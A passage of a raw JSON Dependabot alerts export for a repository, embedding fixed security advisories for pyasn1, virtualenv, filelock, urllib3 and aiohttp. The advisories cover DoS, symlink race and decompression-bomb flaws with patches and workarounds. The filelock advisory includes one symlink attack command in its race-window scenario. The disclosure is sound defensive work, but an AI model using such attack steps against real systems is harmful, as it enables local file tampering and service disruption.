DoS\n\n\n\n\n#### Leak analysis\n\nA potential heap leak was investigated but came back clean:\n```\n[*] Creating 1000KB payload...\n[*] Decoding with pyasn1...\n[*] Materializing to string...\n[+] Decoded 2157784 characters\n[+] Binary representation: 896001 bytes\n[+] Dumped to heap_dump.bin\n\n[*] First 64 bytes (hex):\n 01020408102040810204081020408102040810204081020408102040810204081020408102040810204081020408102040810204081020408102040810204081\n\n[*] First 64 bytes (ASCII/hex dump):\n 0000: 01 02 04 08 10 20 40 81 02 04 08 10 20 40 81 02 ..... @..... @..\n 0010: 04 08 10 20 40 81 02 04 08 10 20 40 81 02 04 08 ... @..... @....\n 0020: 10 20 40 81 02 04 08 10 20 40 81 02 04 08 10 20 . @..... @..... \n 0030: 40 81 02 04 08 10 20 40 81 02 04 08 10 20 40 81 @..... @..... @.\n\n[*] Digit distribution analysis:\n '0': 10.1%\n '1': 9.9%\n '2': 10.0%\n '3': 9.9%\n '4': 9.9%\n '5': 10.0%\n '6': 10.0%\n '7': 10.0%\n '8': 9.9%\n '9': 10.1%\n```\n\n### Scenario\n\n1. An attacker creates a malicious X.509 certificate.\n2. The application validates certificates.\n3. The application accepts the malicious certificate and tries decoding resulting in the issues mentioned above.\n\n### Impact\n\nThis issue can affect resource consumption and hang systems or stop services.\nThis may affect:\n- LDAP servers\n- TLS/SSL endpoints\n- OCSP responders\n- etc.\n\n### Recommendation\n\nAdd a limit to the allowed bytes in the decoder.","severity":"high","identifiers":[{"value":"GHSA-63vm-454h-vhhq","type":"GHSA"},{"value":"CVE-2026-23490","type":"CVE"}],"references":[{"url":"https://github.com/pyasn1/pyasn1/security/advisories/GHSA-63vm-454h-vhhq"},{"url":"https://github.com/pyasn1/pyasn1/commit/be353d755f42ea36539b4f5053c652ddf56979a6"},{"url":"https://github.com/pyasn1/pyasn1/blob/0f07d7242a78ab4d129b26256d7474f7168cf536/pyasn1/codec/ber/decoder.py#L496"},{"url":"https://github.com/pyasn1/pyasn1/releases/tag/v0.6.2"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-23490"},{"url":"https://github.com/pyasn1/pyasn1/commit/3908f144229eed4df24bd569d16e5991ace44970"},{"url":"https://lists.debian.org/debian-lts-announce/2026/02/msg00002.html"},{"url":"https://github.com/advisories/GHSA-63vm-454h-vhhq"}],"published_at":"2026-01-16T19:19:25Z","updated_at":"2026-02-01T18:30:16Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"pyasn1"},"severity":"high","vulnerable_version_range":"= 0.6.1","first_patched_version":{"identifier":"0.6.2"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","score":7.5},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":0.00021,"percentile":0.05578},"cvss":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","score":7.5},"cwes":[{"cwe_id":"CWE-400","name":"Uncontrolled Resource Consumption"},{"cwe_id":"CWE-770","name":"Allocation of Resources Without Limits or Throttling"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"pyasn1"},"severity":"high","vulnerable_version_range":"= 0.6.1","first_patched_version":{"identifier":"0.6.2"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/17","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/17","created_at":"2026-04-30T08:37:32Z","updated_at":"2026-05-13T05:27:06Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:06Z","auto_dismissed_at":null},{"number":16,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"virtualenv"},"manifest_path":"methods/evermemos/uv.lock","scope":"runtime","relationship":"transitive"},"security_advisory":{"ghsa_id":"GHSA-597g-3phw-6986","cve_id":"CVE-2026-22702","summary":"virtualenv Has TOCTOU Vulnerabilities in Directory Creation","description":"## Impact\n\nTOCTOU (Time-of-Check-Time-of-Use) vulnerabilities in `virtualenv` allow local attackers to perform symlink-based attacks on directory creation operations. An attacker with local access can exploit a race condition between directory existence checks and creation to redirect virtualenv's app_data and lock file operations to attacker-controlled locations.\n\n**Affected versions:** All versions up to and including 20.36.1\n\n**Affected users:** Any user running `virtualenv` on multi-user systems where untrusted local users have filesystem access to shared temporary directories or where `VIRTUALENV_OVERRIDE_APP_DATA` points to a user-writable location.\n\n**Attack scenarios:**\n- Cache poisoning: Attacker corrupts wheels or Python metadata in the cache\n- Information disclosure: Attacker reads sensitive cached data or metadata\n- Lock bypass: Attacker controls lock file semantics to cause concurrent access violations\n- Denial of service: Lock starvation preventing virtualenv operations\n\n## Patches\n\nThe vulnerability has been patched by replacing check-then-act patterns with atomic `os.makedirs(..., exist_ok=True)` operations.\n\n**Fixed in:** PR #3013\n\n**Versions with the fix:** 20.36.2 and later\n\nUsers should upgrade to version 20.36.2 or later.\n\n## Workarounds\n\nIf you cannot upgrade immediately:\n\n1. Ensure `VIRTUALENV_OVERRIDE_APP_DATA` points to a directory owned by the current user with restricted permissions (mode 0700)\n2. Avoid running `virtualenv` in shared temporary directories where other users have write access\n3. Use separate user accounts for different projects to isolate app_data directories\n\n## References\n\n- GitHub PR: https://github.com/pypa/virtualenv/pull/3013\n- Vulnerability reported by: @tsigouris007\n- CWE-362: Concurrent Execution using Shared Resource with Improper Synchronization (TOCTOU)\n- CWE-59: Improper Link Resolution Before File Access","severity":"medium","identifiers":[{"value":"GHSA-597g-3phw-6986","type":"GHSA"},{"value":"CVE-2026-22702","type":"CVE"}],"references":[{"url":"https://github.com/pypa/virtualenv/security/advisories/GHSA-597g-3phw-6986"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-22702"},{"url":"https://github.com/pypa/virtualenv/pull/3013"},{"url":"https://github.com/pypa/virtualenv/commit/dec4cec5d16edaf83a00a658f32d1e032661cebc"},{"url":"https://github.com/advisories/GHSA-597g-3phw-6986"}],"published_at":"2026-01-13T18:45:57Z","updated_at":"2026-01-13T18:45:59Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"virtualenv"},"severity":"medium","vulnerable_version_range":"< 20.36.1","first_patched_version":{"identifier":"20.36.1"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L","score":4.5},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":0.00016,"percentile":0.03803},"cvss":{"vector_string":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L","score":4.5},"cwes":[{"cwe_id":"CWE-59","name":"Improper Link Resolution Before File Access ('Link Following')"},{"cwe_id":"CWE-362","name":"Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition')"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"virtualenv"},"severity":"medium","vulnerable_version_range":"< 20.36.1","first_patched_version":{"identifier":"20.36.1"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/16","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/16","created_at":"2026-04-30T08:37:32Z","updated_at":"2026-05-13T05:27:06Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:06Z","auto_dismissed_at":null},{"number":15,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"filelock"},"manifest_path":"methods/evermemos/uv.lock","scope":"runtime","relationship":"transitive"},"security_advisory":{"ghsa_id":"GHSA-qmgc-5h2g-mvrw","cve_id":"CVE-2026-22701","summary":"filelock Time-of-Check-Time-of-Use (TOCTOU) Symlink Vulnerability in SoftFileLock","description":"## Vulnerability Summary\n\n**Title:** Time-of-Check-Time-of-Use (TOCTOU) Symlink Vulnerability in SoftFileLock\n\n**Affected Component:** `filelock` package - `SoftFileLock` class\n**File:** `src/filelock/_soft.py` lines 17-27\n**CWE:** CWE-362, CWE-367, CWE-59\n\n---\n\n## Description\n\nA TOCTOU race condition vulnerability exists in the `SoftFileLock` implementation of the filelock package. An attacker with local filesystem access and permission to create symlinks can exploit a race condition between the permission validation and file creation to cause lock operations to fail or behave unexpectedly.\n\nThe vulnerability occurs in the `_acquire()` method between `raise_on_not_writable_file()` (permission check) and `os.open()` (file creation). During this race window, an attacker can create a symlink at the lock file path, potentially causing the lock to operate on an unintended target file or leading to denial of service.\n\n### Attack Scenario\n\n```\n1. Lock attempts to acquire on /tmp/app.lock\n2. Permission validation passes\n3. [RACE WINDOW] - Attacker creates: ln -s /tmp/important.txt /tmp/app.lock\n4. os.open() tries to create lock file\n5. Lock operates on attacker-controlled target file or fails\n```\n\n---\n\n## Impact\n\n_What kind of vulnerability is it? Who is impacted?_\n\nThis is a **Time-of-Check-Time-of-Use (TOCTOU) race condition vulnerability** affecting any application using `SoftFileLock` for inter-process synchronization.\n\n**Affected Users:**\n- Applications using `filelock.SoftFileLock` directly\n- Applications using the fallback `FileLock` on systems without `fcntl` support (e.g., GraalPy)\n\n**Consequences:**\n- **Silent lock acquisition failure** - applications may not detect that exclusive resource access is not guaranteed\n- **Denial of Service** - attacker can prevent lock file creation by maintaining symlink\n- **Resource serialization failures** - multiple processes may acquire \"locks\" simultaneously\n- **Unintended file operations** - lock could operate on attacker-controlled files\n\n**CVSS v4.0 Score:** 5.6 (Medium)\n**Vector:** CVSS:4.0/AV:L/AT:L/PR:L/UI:N/VC:N/VI:L/VA:H/SC:N/SI:N/SA:N\n\n**Attack Requirements:**\n- Local filesystem access to the directory containing lock files\n- Permission to create symlinks (standard for regular unprivileged users on Unix/Linux)\n- Ability to time the symlink creation during the narrow race window\n\n---\n\n## Patches\n\n_Has the problem been patched? What versions should users upgrade to?_\n\nYes, the vulnerability has been patched by adding the `O_NOFOLLOW` flag to prevent symlink following during lock file creation.\n\n**Patched Version:** Next release (commit: 255ed068bc85d1ef406e50a135e1459170dd1bf0)\n\n**Mitigation Details:**\n- The `O_NOFOLLOW` flag is added conditionally and gracefully degrades on platforms without support\n- On platforms with `O_NOFOLLOW` support (most modern systems): symlink attacks are completely prevented\n- On platforms without `O_NOFOLLOW` (e.g., GraalPy): TOCTOU window remains but is documented\n\n**Users should:**\n- Upgrade to the patched version when available\n- For critical deployments, consider using `UnixFileLock` or `WindowsFileLock` instead of the fallback `SoftFileLock`\n\n---\n\n## Workarounds\n\n_Is there a way for users to fix or remediate the vulnerability without upgrading?_\n\nFor users unable to update immediately:\n\n1. **Avoid `SoftFileLock` in security-sensitive contexts** - use `UnixFileLock` or `WindowsFileLock` when available (these were already patched for CVE-2025-68146)\n\n2. **Restrict filesystem permissions** - prevent untrusted users from creating symlinks in lock file directories:\n ```bash\n chmod 700 /path/to/lock/directory\n ```\n\n3. **Use process isolation** - isolate untrusted code from lock file paths to prevent symlink creation\n\n4. **Monitor lock operations** - implement application-level checks to verify lock acquisitions are successful before proceeding with critical operations\n\n---\n\n## References\n\n_Are there any links users can visit to find out more?_\n\n- **Similar Vulnerability:** CVE-2025-68146 (TOCTOU vulnerability in UnixFileLock/WindowsFileLock)\n- **CWE-362 (Concurrent Execution using Shared Resource):** https://cwe.mitre.org/data/definitions/362.html\n- **CWE-367 (Time-of-check Time-of-use Race Condition):** https://cwe.mitre.org/data/definitions/367.html\n- **CWE-59 (Improper Link Resolution Before File Access):** https://cwe.mitre.org/data/definitions/59.html\n- **O_NOFOLLOW documentation:** https://man7.org/linux/man-pages/man2/open.2.html\n- **GitHub Repository:** https://github.com/tox-dev/filelock\n\n---\n\n**Reported by:** George Tsigourakos (@tsigouris007)","severity":"medium","identifiers":[{"value":"GHSA-qmgc-5h2g-mvrw","type":"GHSA"},{"value":"CVE-2026-22701","type":"CVE"}],"references":[{"url":"https://github.com/tox-dev/filelock/security/advisories/GHSA-qmgc-5h2g-mvrw"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-22701"},{"url":"https://github.com/tox-dev/filelock/commit/255ed068bc85d1ef406e50a135e1459170dd1bf0"},{"url":"https://github.com/tox-dev/filelock/commit/41b42dd2c72aecf7da83dbda5903b8087dddc4d5"},{"url":"https://github.com/advisories/GHSA-qmgc-5h2g-mvrw"}],"published_at":"2026-01-13T18:44:55Z","updated_at":"2026-01-13T18:44:59Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"filelock"},"severity":"medium","vulnerable_version_range":"< 3.20.3","first_patched_version":{"identifier":"3.20.3"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:H","score":5.3},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":6.0e-05,"percentile":0.00422},"cvss":{"vector_string":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:H","score":5.3},"cwes":[{"cwe_id":"CWE-59","name":"Improper Link Resolution Before File Access ('Link Following')"},{"cwe_id":"CWE-362","name":"Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition')"},{"cwe_id":"CWE-367","name":"Time-of-check Time-of-use (TOCTOU) Race Condition"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"filelock"},"severity":"medium","vulnerable_version_range":"< 3.20.3","first_patched_version":{"identifier":"3.20.3"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/15","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/15","created_at":"2026-04-30T08:37:32Z","updated_at":"2026-05-13T05:27:06Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:06Z","auto_dismissed_at":null},{"number":14,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"urllib3"},"manifest_path":"methods/evermemos/uv.lock","scope":"runtime","relationship":"transitive"},"security_advisory":{"ghsa_id":"GHSA-38jv-5279-wg99","cve_id":"CVE-2026-21441","summary":"Decompression-bomb safeguards bypassed when following HTTP redirects (streaming API)","description":"### Impact\n\nurllib3's [streaming API](https://urllib3.readthedocs.io/en/2.6.2/advanced-usage.html#streaming-and-i-o) is designed for the efficient handling of large HTTP responses by reading the content in chunks, rather than loading the entire response body into memory at once.\n\nurllib3 can perform decoding or decompression based on the HTTP `Content-Encoding` header (e.g., `gzip`, `deflate`, `br`, or `zstd`). When using the streaming API, the library decompresses only the necessary bytes, enabling partial content consumption.\n\nHowever, for HTTP redirect responses, the library would read the entire response body to drain the connection and decompress the content unnecessarily. This decompression occurred even before any read methods were called, and configured read limits did not restrict the amount of decompressed data. As a result, there was no safeguard against decompression bombs. A malicious server could exploit this to trigger excessive resource consumption on the client (high CPU usage and large memory allocations for decompressed data; CWE-409).\n\n### Affected usages\n\nApplications and libraries using urllib3 version 2.6.2 and earlier to stream content from untrusted sources by setting `preload_content=False` when they do not disable redirects.\n\n\n### Remediation\n\nUpgrade to at least urllib3 v2.6.3 in which the library does not decode content of redirect responses when `preload_content=False`.\n\nIf upgrading is not immediately possible, disable [redirects](https://urllib3.readthedocs.io/en/2.6.2/user-guide.html#retrying-requests) by setting `redirect=False` for requests to untrusted source.","severity":"high","identifiers":[{"value":"GHSA-38jv-5279-wg99","type":"GHSA"},{"value":"CVE-2026-21441","type":"CVE"}],"references":[{"url":"https://github.com/urllib3/urllib3/security/advisories/GHSA-38jv-5279-wg99"},{"url":"https://github.com/urllib3/urllib3/commit/8864ac407bba8607950025e0979c4c69bc7abc7b"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-21441"},{"url":"https://lists.debian.org/debian-lts-announce/2026/01/msg00017.html"},{"url":"https://github.com/advisories/GHSA-38jv-5279-wg99"}],"published_at":"2026-01-07T19:18:14Z","updated_at":"2026-01-23T16:05:22Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"urllib3"},"severity":"high","vulnerable_version_range":">= 1.22, < 2.6.3","first_patched_version":{"identifier":"2.6.3"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","score":7.5},"cvss_v4":{"vector_string":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:H","score":8.9}},"epss":{"percentage":0.00032,"percentile":0.0921},"cvss":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","score":7.5},"cwes":[{"cwe_id":"CWE-409","name":"Improper Handling of Highly Compressed Data (Data Amplification)"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"urllib3"},"severity":"high","vulnerable_version_range":">= 1.22, < 2.6.3","first_patched_version":{"identifier":"2.6.3"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/14","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/14","created_at":"2026-04-30T08:37:32Z","updated_at":"2026-05-13T05:27:06Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:06Z","auto_dismissed_at":null},{"number":13,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"aiohttp"},"manifest_path":"methods/evermemos/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-fh55-r93g-j68g","cve_id":"CVE-2025-69230","summary":"AIOHTTP Vulnerable to Cookie Parser Warning Storm","description":"### Summary\nReading multiple invalid cookies can lead to a logging storm.\n\n### Impact\nIf the ``cookies`` attribute is accessed in an application, then an attacker may be able to trigger a storm of warning-level logs using a specially crafted Cookie header.\n\n----\n\nPatch: https://github.com/aio-libs/aiohttp/commit/64629a0834f94e46d9881f4e99c41a137e1f3326","severity":"low","identifiers":[{"value":"GHSA-fh55-r93g-j68g","type":"GHSA"},{"value":"CVE-2025-69230","type":"CVE"}],"references":[{"url":"https://github.com/aio-libs/aiohttp/security/advisories/GHSA-fh55-r93g-j68g"},{"url":"https://github.com/aio-libs/aiohttp/commit/64629a0834f94e46d9881f4e99c41a137e1f3326"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-69230"},{"url":"https://github.com/advisories/GHSA-fh55-r93g-j68g"}],"published_at":"2026-01-05T23:13:46Z","updated_at":"2026-01-06T16:07:05Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"low","vulnerable_version_range":"<= 3.13.2","first_patched_version":{"identifier":"3.13.3"}}],"cvss_severities":{"cvss_v3":{"vector_string":null,"score":0.0},"cvss_v4":{"vector_string":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:U","score":2.7}},"epss":{"percentage":0.00015,"percentile":0.03409},"cvss":{"vector_string":null,"score":0.0},"cwes":[{"cwe_id":"CWE-779","name":"Logging of Excessive Data"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"low","vulnerable_version_range":"<= 3.13.2","first_patched_version":{"identifier":"3.13.3"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/13","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/13","created_at":"2026-04-30T08:37:32Z","updated_at":"2026-05-13T05:27:06Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:06Z","auto_dismissed_at":null},{"number":12,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"aiohttp"},"manifest_path":"methods/evermemos/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-g84x-mcqj-x9qq","cve_id":"CVE-2025-69229","summary":"AIOHTTP vulnerable to DoS through chunked messages","description":"### Summary\n\nHandling of chunked messages can result in excessive blocking CPU usage when receiving a large number of chunks.\n\n### Impact\n\nIf an application makes use of the `request.read()` method in an endpoint, it may be possible for an attacker to cause the server to spend a moderate amount of blocking CPU time (e.g. 1 second) while processing the request. This could potentially lead to DoS as the server would be unable to handle other requests during that time.\n\n-----\n\nPatch: https://github.com/aio-libs/aiohttp/commit/dc3170b56904bdf814228fae70a5501a42a6c712\nPatch: https://github.com/aio-libs/aiohttp/commit/4ed97a4e46eaf61bd0f05063245f613469700229","severity":"medium","identifiers":[{"value":"GHSA-g84x-mcqj-x9qq","type":"GHSA"},{"value":"CVE-2025-69229","type":"CVE"}],"references":[{"url":"https://github.com/aio-libs/aiohttp/security/advisories/GHSA-g84x-mcqj-x9qq"},{"url":"https://github.com/aio-libs/aiohttp/commit/4ed97a4e46eaf61bd0f05063245f613469700229"},{"url":"https://github.com/aio-libs/aiohttp/commit/dc3170b56904bdf814228fae70a5501a42a6c712"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-69229"},{"url":"https://github.com/advisories/GHSA-g84x-mcqj-x9qq"}],"published_at":"2026-01-05T23:13:29Z","updated_at":"2026-01-06T16:07:01Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"medium","vulnerable_version_range":"<= 3.13.2","first_patched_version":{"identifier":"3.13.3"}}],"cvss_severities":{"cvss_v3":{"vector_string":null,"score":0.0},"cvss_v4":{"vector_string":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U","score":6.6}},"epss":{"percentage":0.00067,"percentile":0.20533},"cvss":{"vector_string":null,"score":0.0},"cwes":[{"cwe_id":"CWE-770","name":"Allocation of Resources Without Limits or Throttling"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"medium","vulnerable_version_range":"<= 3.13.2","first_patched_version":{"identifier":"3.13.3"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/12","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/12","created_at":"2026-04-30T08:37:31Z","updated_at":"2026-05-13T05:27:06Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:06Z","auto_dismissed_at":null},{"number":11,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"aiohttp"},"manifest_path":"methods/evermemos/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-6jhg-hg63-jvvf","cve_id":"CVE-2025-69228","summary":"AIOHTTP vulnerable to denial of service through large payloads","description":"### Summary\nA request can be crafted in such a way that an aiohttp server's memory fills up uncontrollably during processing.\n\n### Impact\nIf an application includes a handler that uses the `Request.post()` method, an attacker may be able to freeze the server by exhausting the memory.\n\n-----\n\nPatch: https://github.com/aio-libs/aiohttp/commit/b7dbd35375aedbcd712cbae8ad513d56d11cce60","severity":"medium","identifiers":[{"value":"GHSA-6jhg-hg63-jvvf","type":"GHSA"},{"value":"CVE-2025-69228","type":"CVE"}],"references":[{"url":"https://github.com/aio-libs/aiohttp/security/advisories/GHSA-6jhg-hg63-jvvf"},{"url":"https://github.com/aio-libs/aiohttp/commit/b7dbd35375aedbcd712cbae8ad513d56d11cce60"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-69228"},{"url":"https://github.com/advisories/GHSA-6jhg-hg63-jvvf"}],"published_at":"2026-01-05T23:13:14Z","updated_at":"2026-01-08T12:17:13Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"medium","vulnerable_version_range":"<= 3.13.2","first_patched_version":{"identifier":"3.13.3"}}],"cvss_severities":{"cvss_v3":{"vector_string":null,"score":0.0},"cvss_v4":{"vector_string":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U","score":6.6}},"epss":{"percentage":0.00082,"percentile":0.23714},"cvss":{"vector_string":null,"score":0.0},"cwes":[{"cwe_id":"CWE-770","name":"Allocation of Resources Without Limits or Throttling"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"medium","vulnerable_version_range":"<= 3.13.2","first_patched_version":{"identifier":"3.13.3"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/11","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/11","created_at":"2026-04-30T08:37:31Z","updated_at":"2026-05-13T05:27:06Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:06Z","auto_dismissed_at":null},{"number":10,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"aiohttp"},"manifest_path":"methods/evermemos/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-jj3x-wxrx-4x23","cve_id":"CVE-2025-69227","summary":"AIOHTTP vulnerable to DoS when bypassing asserts","description":"### Summary\nWhen assert statements are bypassed, an infinite loop can occur, resulting in a DoS attack when processing a POST body.\n\n### Impact\nIf optimisations are enabled (`-O` or `PYTHONOPTIMIZE=1`), and the application includes a handler that uses the `Request.post()` method, then an attacker may be able to execute a DoS attack with a specially crafted message.\n\n------\n\nPatch: https://github.com/aio-libs/aiohttp/commit/bc1319ec3cbff9438a758951a30907b072561259","severity":"medium","identifiers":[{"value":"GHSA-jj3x-wxrx-4x23","type":"GHSA"},{"value":"CVE-2025-69227","type":"CVE"}],"references":[{"url":"https://github.com/aio-libs/aiohttp/security/advisories/GHSA-jj3x-wxrx-4x23"},{"url":"https://github.com/aio-libs/aiohttp/commit/bc1319ec3cbff9438a758951a30907b072561259"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-69227"},{"url":"https://github.com/advisories/GHSA-jj3x-wxrx-4x23"}],"published_at":"2026-01-05T23:10:15Z","updated_at":"2026-01-06T16:06:51Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"medium","vulnerable_version_range":"<= 3.13.2","first_patched_version":{"identifier":"3.13.3"}}],"cvss_severities":{"cvss_v3":{"vector_string":null,"score":0.0},"cvss_v4":{"vector_string":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U","score":6.6}},"epss":{"percentage":0.00082,"percentile":0.23714},"cvss":{"vector_string":null,"score":0.0},"cwes":[{"cwe_id":"CWE-835","name":"Loop with Unreachable Exit Condition ('Infinite Loop')"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"medium","vulnerable_version_range":"<= 3.13.2","first_patched_version":{"identifier":"3.13.3"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/10","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/10","created_at":"2026-04-30T08:37:31Z","updated_at":"2026-05-13T05:27:05Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:05Z","auto_dismissed_at":null},{"number":9,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"aiohttp"},"manifest_path":"methods/evermemos/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-54jq-c3m8-4m76","cve_id":"CVE-2025-69226","summary":"AIOHTTP vulnerable to brute-force leak of internal static file path components","description":"### Summary\nPath normalization for static files prevents path traversal, but opens up the ability for an attacker to ascertain the\nexistence of absolute path components.\n\n### Impact\nIf an application uses `web.static()` (not recommended for production deployments), it may be possible for an attacker to ascertain the existence of path components.\n\n------\n\nPatch: https://github.com/aio-libs/aiohttp/commit/f2a86fd5ac0383000d1715afddfa704413f0711e","severity":"low","identifiers":[{"value":"GHSA-54jq-c3m8-4m76","type":"GHSA"},{"value":"CVE-2025-69226","type":"CVE"}],"references":[{"url":"https://github.com/aio-libs/aiohttp/security/advisories/GHSA-54jq-c3m8-4m76"},{"url":"https://github.com/aio-libs/aiohttp/commit/f2a86fd5ac0383000d1715afddfa704413f0711e"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-69226"},{"url":"https://github.com/advisories/GHSA-54jq-c3m8-4m76"}],"published_at":"2026-01-05T23:09:51Z","updated_at":"2026-01-06T16:06:50Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"low","vulnerable_version_range":"<= 3.13.2","first_patched_version":{"identifier":"3.13.3"}}],"cvss_severities":{"cvss_v3":{"vector_string":null,"score":0.0},"cvss_v4":{"vector_string":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U","score":2.7}},"epss":{"percentage":0.0007,"percentile":0.2125},"cvss":{"vector_string":null,"score":0.0},"cwes":[{"cwe_id":"CWE-22","name":"Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')"},{"cwe_id":"CWE-202","name":"Exposure of Sensitive Information Through Data Queries"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"low","vulnerable_version_range":"<= 